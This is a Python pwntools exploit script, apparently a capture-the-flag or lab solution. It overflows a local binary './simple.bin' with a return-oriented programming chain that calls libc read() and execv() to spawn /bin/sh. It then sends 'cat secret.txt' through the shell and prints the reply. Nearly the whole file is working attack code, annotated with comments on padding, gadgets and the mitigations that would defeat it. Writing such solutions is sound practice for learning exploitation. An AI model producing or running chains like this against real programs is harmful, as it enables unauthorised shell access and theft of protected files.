#!/usr/bin/python3
from pwn import *
import time
def exploit():
    """Run a hard-coded ROP chain against a locally spawned ``./simple.bin``.

    The payload overwrites the saved return address with gadget addresses
    taken from the binary plus ``read``/``execv`` addresses resolved from
    the libc that pwntools finds mapped into the process. A second input is
    then fed to the process and one line of the child's reply is printed.

    Side effects: spawns a subprocess, prints three resolved libc addresses
    and the final line of output to stdout. The process handle is never
    closed.

    Returns:
        None.
    """
    # Spawn the target locally. Everything below is tied to this exact
    # binary (fixed gadget addresses) and to the libc the loader maps into it.
    p = process("./simple.bin")
    # No manual libc analysis needed: pwntools resolves the libc loaded
    # into the running process and exposes its symbol table.
    libc = p.libc
    # write() is resolved for display only; it is not used in the chain.
    write_address = libc.symbols['write']
    read_address = libc.symbols['read']
    execv_address = libc.symbols['execv']
    print('Address of write() within libc library: {}'.format(hex(write_address)))
    print('Address of read() within libc library: {}'.format(hex(read_address)))
    print('Address of execv() within libc library: {}'.format(hex(execv_address)))
    # Fixed in-binary addresses (0x4006xx gadgets, 0x601080 buffer). These
    # stay valid only if the binary is not position-independent; building it
    # with PIE (and a stack protector for the overflow itself) would defeat
    # the chain. NOTE(review): the gadget semantics are implied by the
    # variable names only -- confirm against a disassembly.
    pop_rdi=p64(0x400673)
    nnuull=p64(0x0)
    pop_rsi= p64(0x400671)
    # Presumably filler for a second pop in the pop_rsi gadget; verify.
    any_numb=p64(0x12345678)
    # Presumably a writable buffer in the binary; it receives the read()
    # data and is then passed to execv() as its first argument.
    bins=p64(0x601080)
    # Layout (order is load-bearing): 0x18 bytes of padding up to the saved
    # return address, then read(0, bins, ...) to pull the next send() into
    # `bins`, then execv(bins, 0, ...). rdx is never set by the chain, so
    # both calls inherit whatever the program left in it.
    payload = b'a' * 0x18 + pop_rdi + nnuull +pop_rsi +bins + any_numb + \
        p64(read_address) + pop_rdi + bins + pop_rsi + nnuull + any_numb + \
        p64(execv_address)
    p.send(payload)
    # One line of program output is consumed and discarded before the
    # second stage is sent.
    p.recvline()
    # Data consumed by the chained read(); it lands in `bins` and becomes
    # execv()'s path argument, hence the explicit NUL terminator.
    p.send(b'/bin/sh\0')
    # NOTE(review): a fixed delay is a race; synchronising on the child's
    # output would be more reliable than sleeping.
    time.sleep(0.1)
    p.sendline(b'cat secret.txt')
    # Only the first line of the reply is shown; remaining output is dropped.
    print(p.recvline())
# Run only when executed as a script, not when imported as a module.
if __name__ == "__main__":
    exploit()